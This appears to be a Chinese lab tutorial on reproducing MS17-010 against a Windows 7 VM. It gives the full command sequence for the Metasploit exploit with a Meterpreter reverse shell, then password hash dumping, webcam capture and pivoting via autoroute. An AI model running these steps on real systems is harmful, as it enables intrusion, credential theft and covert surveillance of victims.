复现ms17-010漏洞

复现ms17-010

  • 复现
    • 条件
    • 环境
    • 操作+效果
  • 让我们来看看“hkl”在干嘛


复现

条件

1.靶机必须为win8以下
2.靶机必须同攻击机处于相同网段(即倒数第二位相同)。
3.靶机的445端口必须要开启。

环境

虚拟机kali为攻击机,win7虚拟机为靶机。
kali IP:192.168.1.129
win7 IP:192.168.1.128
注意:攻击机和靶机的IP的倒数第二位必须相同,即必须处于相同网段。

操作+效果

1.打开kali并登录,在终端输入登录命令
复现ms17-010漏洞_第1张图片
2.输入密码"kali"
3.使用kali自带的nmap扫描工具,输入代码进行扫描。

nmap -sS 192.168.1.128(靶机IP)

复现ms17-010漏洞_第2张图片

可见目标靶机445端口开放,说明该win7靶机具有成功复现ms17-010的条件。

4.打开漏洞库

msfconsole

在这里插入图片描述
复现ms17-010漏洞_第3张图片
5.查找ms17-010漏洞

search ms17-010

复现ms17-010漏洞_第4张图片
复现ms17-010漏洞_第5张图片
6.使用扫描板块来检查是否真实存在ms17-010漏洞。

use 3

在这里插入图片描述
真正存在

7.查看use 3模块需要修改的参数。

show options


yes选项是必须要填的,可以看到缺少了RHOSTS
8.设置缺少的相关参数。

set rhosts 192.168.1.128

在这里插入图片描述
9.运行扫描模块

run

复现ms17-010漏洞_第6张图片
10.使用攻击模块

use 0

复现ms17-010漏洞_第7张图片
11.查看攻击板块的参数信息

show options


可见rhosets选项为未设置
12.设置攻击载荷,这里默认为windows/x64/meterpreter/reverse_tcp,然后设置受害者IP,攻击者IP

set payload windows/x64/meterpreter/reverse_tcp
set rhosts 192.168.1.128
set lhost 192.168.1.129

复现ms17-010漏洞_第8张图片
13.检查参数配置无误后就可以进行攻击了

run

复现ms17-010漏洞_第9张图片
攻击成功!

让我们来看看“hkl”在干嘛

1.截屏

screenshot

在这里插入图片描述

2.获取经过哈希加密的密码

hashdump

在这里插入图片描述
3.拍照

webcam_list
webcam_snap

复现ms17-010漏洞_第10张图片
4.控制靶机的cmd并翻译

shell
chcp 65001


5.查看子网

arp -a

复现ms17-010漏洞_第11张图片
6.返回

exit()

复现ms17-010漏洞_第12张图片
7.分配网段给我们的攻击机,方便攻击机将靶机作为跳板

run autoroute -s 192.168.8.0/24

复现ms17-010漏洞_第13张图片
8.返回初始漏洞利用界面

background

复现ms17-010漏洞_第14张图片

你可能感兴趣的:(网络安全课前预习+课下复现,安全,网络,web安全,学习方法)